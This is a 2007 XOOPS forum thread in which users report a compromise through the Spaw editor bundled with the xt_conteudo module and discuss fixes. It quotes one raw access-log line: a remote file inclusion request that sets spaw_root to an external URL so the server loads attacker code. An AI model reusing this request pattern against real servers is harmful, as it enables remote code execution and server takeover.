Re: xt_contuedo is NOT safe [Module troubleshooting] - XOOPS Web Application System

XOOPS

Forum

Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk

1

xt_contuedo is NOT safe

2007/5/30 15:19
guus20
Just popping in
Posts: 1
Since: 2007/5/30

Our server was hacked trough xt_contuedo by inserting malicious code in the Spaw editor. Then they used our server for sending out spyware.

LOG
============================

209.85.105.25 - - [30/May/2007:00:41:42 +0200] "GET /modules/xt_conteudo/admin/spaw/main.php?spaw_root=http://ikhlas.com.my/57.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
============================

Please be adviced xt_contedo isn't SAFE.

2

Re: xt_contuedo is NOT safe

2007/5/30 15:36
JimLunsford
Not too shy to talk
Posts: 191
Since: 2004/10/26

Isn't that also built into the Mastop Publishing module? Big problems for that module if that is true.

3

Re: xt_contuedo is NOT safe

2007/5/30 17:50
orgunozcu
Not too shy to talk
Posts: 136
Since: 2005/9/1 5

it is very big problem. somone tried to my site too. now i cant use Spaw and other editors for xt_conteudo and some smiler modules.

how can we solve??

www.cancer-aids.net

www.cinselliksaglik.com

www.konyaninsesi.com
www.psikolojikdanisman.org
www.xoopshocasi.com

4

Re: xt_contuedo is NOT safe

2007/5/30 18:27
topet05
Just popping in
Posts: 33
Since: 2003/4/19

Mastop Publish was developed from zero and dont use the Spaw Editor, but TinyMCE.
XT-Conteudo was discontinued lot time ago.
How fix it? Change your XT-Conteudo for Mastop Publish.
We will develop a upgrader soon.
Regards

5

Re: xt_contuedo is NOT safe

2007/5/30 23:51
wcrwcr
Home away from home
Posts: 1114
Since: 2003/12/12

Hi all

Just to inform that the old tinycontent is vulnerable too
.
SAme happens to me in an old XOOPS site.

I?ve just deleted the spawn folder..just in case

6

Re: xt_contuedo is NOT safe

2007/5/31 4:18
ewonline
Not too shy to talk
Posts: 198
Since: 2004/11/17

You should edit your post to remove that URL so others dont find out use that exploit.

Resized Image

Login

Username

Password

Remember me

Register now! | Lost Password?

Search

Advanced Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

3/16 2:02 Mamba
Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

3/14 20:34 hnn_gerd
Re: NewBB v 5.1.0 b 6

3/7 12:07 Mamba
Re: NewBB v 5.1.0 b 6

2/23 2:57 Mamba
NewBB v 5.1.0 b 6

2/17 18:57 spierrard
Re: XOOPS 2.5.11 search user is not working

2/14 13:11 Mamba
Re: oledrion

2/14 11:29 Mamba
Re: oledrion

2/13 15:22 oswaldo
Re: oledrion

2/12 19:20 Mamba
Re: oledrion

2/12 16:02 oswaldo

Who's Online

169 user(s) are online (111 user(s) are browsing Support Forums)

Members: 0

Guests: 169

Donat-O-Meter

Stats
Goal:	$100.00
Due Date:	Apr 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}

{{ record.commit.author.name }} {{ record.commit.author.date | formatDate }}